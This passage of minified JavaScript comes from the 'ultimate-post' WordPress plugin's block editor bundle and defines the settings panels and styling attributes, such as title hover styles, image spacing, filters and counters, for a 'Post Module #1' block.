More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:4,data:{type:"range",key:"lgImgSpacing",label:__("Large Image Spacing ( Y )","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exStyle:["imgMargin"]}));default:return null}}},21910:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},columnGridGap:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-post-module1 { margin: 0 -{{columnGridGap}}; } \n          {{ULTP}} .ultp-block-post-module1 .ultp-big-post-module1, \n          {{ULTP}} .ultp-block-post-module1 .ultp-small-post-module1 { padding: 0 {{columnGridGap}};} \n          {{ULTP}} .ultp-block-row {grid-column-gap: {{columnGridGap}}; }"}]},largeHeight:{type:"object",default:{lg:"245",unit:"px"},style:[{selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-content-wrap .ultp-block-image img {width: 100%; object-fit: cover; height: {{largeHeight}};}"}]},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-big-post-module1 .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"22",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item .ultp-block-title, \n          {{ULTP}} .ultp-small-post-module1 .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLgPadding:{type:"object",default:{lg:{top:10,bottom:8,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-title { padding:{{titleLgPadding}}; }"}]},titleLength:{type:"string",default:0},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"},{key:"showImage",condition:"==",value:!0}]}]},imgWidth:{type:"object",default:{lg:"80",sm:"65",xs:"",ulg:"px",usm:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image img {height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image, \n        {{ULTP}} .ultp-block-image img, \n        {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:before, \n        {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:after { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img, \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image, \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:before, \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:after { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"20"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout2"},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},lgImgSpacing:{type:"object",default:{lg:"0"},style:[{selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-image { margin-bottom:{{lgImgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,    \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,    \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout4","layout5"]}],selector:"{{ULTP}} .ultp-layout4 .ultp-small-post-module1 .ultp-block-content::before,   \n          {{ULTP}} .ultp-layout5 .ultp-small-post-module1 .ultp-block-item::before { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!1},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"15"},style:[{selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { padding-bottom: {{septSpace}}px; }   \n          {{ULTP}} .ultp-small-post-module1 .ultp-block-item:not(:last-child) { margin-bottom: {{septSpace}}px; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }   \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }   \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }   \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl   \n          {{ULTP}} .ultp-block-readmore a { display: flex; flex-direction: row-reverse; justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},columnFlip:{type:"boolean",default:!1},headingText:{type:"string",default:"Post Module #1"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto;}"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover,   \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; }   \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover,   \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active,   \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a,   \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["pagiBlockCompatibility","advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["pagiMargin"],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"metaSeparatorColor",default:"var(--postx_preset_Contrast_3_color)"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"catSacing",default:{lg:{top:15,bottom:0,left:0,right:0,unit:"px"}}},{key:"catPadding",default:{lg:{top:0,right:0,bottom:0,left:0,unit:"px"}}},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},37549:(e,